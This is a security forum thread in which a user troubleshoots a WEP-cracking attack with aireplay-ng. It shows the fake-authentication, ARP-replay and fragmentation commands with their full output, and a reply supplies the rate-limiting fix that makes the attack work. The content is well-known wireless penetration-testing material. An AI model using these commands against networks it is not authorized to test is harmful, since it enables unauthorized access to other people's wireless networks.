
Thread: BT3 aireplay-ng not working

  1. #1
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    7

    BT3 aireplay-ng not working

    Hello,

    I have a problem getting the WEP key from my AP.

    Here are the commands I use.

    In the #Data field, after one hour, nothing happens.



    CH 10 ][ Elapsed: 20 mins ][ 2008-12-25 14:40

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:04:0E:56:01:9E 23 12 2926 59 0 10 54 WEP WEP default


    bt ~ # aireplay-ng -1 6000 -e DSLhome -a 00:04:0E:56:01:9E -h 00:11:22:33:44:55 wlan0
    14:26:21 Waiting for beacon frame (BSSID: 00:04:0E:56:01:9E) on channel 10

    14:26:22 Sending Authentication Request (Open System)

    14:26:24 Sending Authentication Request (Open System)

    14:26:26 Sending Authentication Request (Open System)

    14:26:28 Sending Authentication Request (Open System)

    14:26:30 Sending Authentication Request (Open System)

    14:26:32 Sending Authentication Request (Open System)

    14:26:34 Sending Authentication Request (Open System)

    14:26:36 Sending Authentication Request (Open System)

    14:26:38 Sending Authentication Request (Open System)

    14:26:40 Sending Authentication Request (Open System)

    14:26:42 Sending Authentication Request (Open System)

    14:26:44 Sending Authentication Request (Open System)

    14:26:46 Sending Authentication Request (Open System)

    14:26:48 Sending Authentication Request (Open System)

    14:26:50 Sending Authentication Request (Open System)

    14:26:52 Sending Authentication Request (Open System)
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.



    bt ~ # aireplay-ng -3 -b 00:04:0E:56:01:9E -h 00:11:22:33:44:55 wlan0
    For information, no action required: Using gettimeofday() instead of /dev/rtc
    14:31:09 Waiting for beacon frame (BSSID: 00:04:0E:56:01:9E) on channel 10
    Saving ARP requests in replay_arp-1225-143109.cap
    You should also start airodump-ng to capture replies.
    Read 1079 packets (got 1 ARP requests and 0 ACKs), sent 20797 packets...(484 pps)


    bt ~ # aireplay-ng -5 -b 00:04:0E:56:01:9E -h 00:11:22:33:44:55 wlan0
    14:19:56 Waiting for beacon frame (BSSID: 00:04:0E:56:01:9E) on channel 10
    14:19:57 Waiting for a data packet...
    Read 436 packets...

    Size: 616, FromDS: 1, ToDS: 0 (WEP)

    BSSID = 00:04:0E:56:01:9E
    Dest. MAC = FF:FF:FF:FF:FF:FF
    Source MAC = 00:04:0E:56:01:9C


    Use this packet ? y

    Saving chosen packet in replay_src-1225-142301.cap
    14:23:08 Data packet found!
    14:23:08 Sending fragmented packet
    14:23:10 No answer, repeating...
    14:23:10 Trying a LLC NULL packet
    14:23:10 Sending fragmented packet
    14:23:11 No answer, repeating...
    14:23:11 Sending fragmented packet
    14:23:13 No answer, repeating...
    14:23:13 Trying a LLC NULL packet
    14:23:13 Sending fragmented packet
    14:23:15 No answer, repeating...
    14:23:15 Sending fragmented packet
    14:23:16 No answer, repeating...
    14:23:16 Trying a LLC NULL packet
    14:23:16 Sending fragmented packet
    14:23:18 No answer, repeating...
    14:23:18 Sending fragmented packet
    14:23:20 No answer, repeating...
    14:23:20 Trying a LLC NULL packet
    14:23:20 Sending fragmented packet
    14:23:21 No answer, repeating...
    14:23:21 Sending fragmented packet
    14:23:23 No answer, repeating...
    14:23:23 Trying a LLC NULL packet
    14:23:23 Sending fragmented packet
    14:23:24 No answer, repeating...
    14:23:24 Sending fragmented packet
    14:23:26 No answer, repeating...
    14:23:26 Still nothing, trying another packet...


    Size: 118, FromDS: 1, ToDS: 0 (WEP)

    BSSID = 00:04:0E:56:01:9E
    Dest. MAC = FF:FF:FF:FF:FF:FF
    Source MAC = 00:11:6B:18:4D:1B


    Use this packet ? y

    Saving chosen packet in replay_src-1225-142326.cap
    14:23:32 Data packet found!
    14:23:32 Sending fragmented packet
    14:23:33 No answer, repeating...
    14:23:33 Trying a LLC NULL packet
    14:23:33 Sending fragmented packet
    14:23:35 No answer, repeating...
    14:23:35 Sending fragmented packet
    14:23:36 No answer, repeating...
    14:23:36 Trying a LLC NULL packet
    14:23:36 Sending fragmented packet
    14:23:38 No answer, repeating...
    14:23:38 Sending fragmented packet
    14:23:39 No answer, repeating...
    14:23:39 Trying a LLC NULL packet
    14:23:39 Sending fragmented packet
    14:23:41 No answer, repeating...
    14:23:41 Sending fragmented packet
    14:23:42 No answer, repeating...
    14:23:42 Trying a LLC NULL packet
    14:23:42 Sending fragmented packet
    14:23:44 No answer, repeating...
    14:23:44 Sending fragmented packet



    bt ~ # aireplay-ng -3 -b 00:04:0E:56:01:9E -h 00:11:22:33:44:55 wlan0
    14:23:51 Waiting for beacon frame (BSSID: 00:04:0E:56:6C:9E) on channel 10
    Saving ARP requests in replay_arp-1225-142351.cap
    You should also start airodump-ng to capture replies.
    Read 2190 packets (got 2 ARP requests and 0 ACKs), sent 129748 packets...(499 pps)

  2. #2
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Since the fake authentication (-1) isn't successful, there is no point in moving on with the other attack modes, as the AP will simply disregard all packets sent out by you.
    -Monkeys are like nature's humans.

  3. #3
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    7

    Thanks for the answer.

    When -1 is not working with the smiley, I have no chance of getting the WEP key with -3, -4, -5; do I understand you right?

    Is there maybe another command to test with -1?

  4. #4
    Senior Member
    Join Date
    Feb 2010
    Location
    Between the two: BackTrack 4 and FwdTrack4
    Posts
    854

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.

    Limit the injection rate:

    iwconfig wlan0 rate 1M

    and proceed with fake auth, as it's necessary to authenticate with the AP first.


  5. #5
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    7

    Thanks, with this it is working.
    iwconfig wlan0 rate 1M
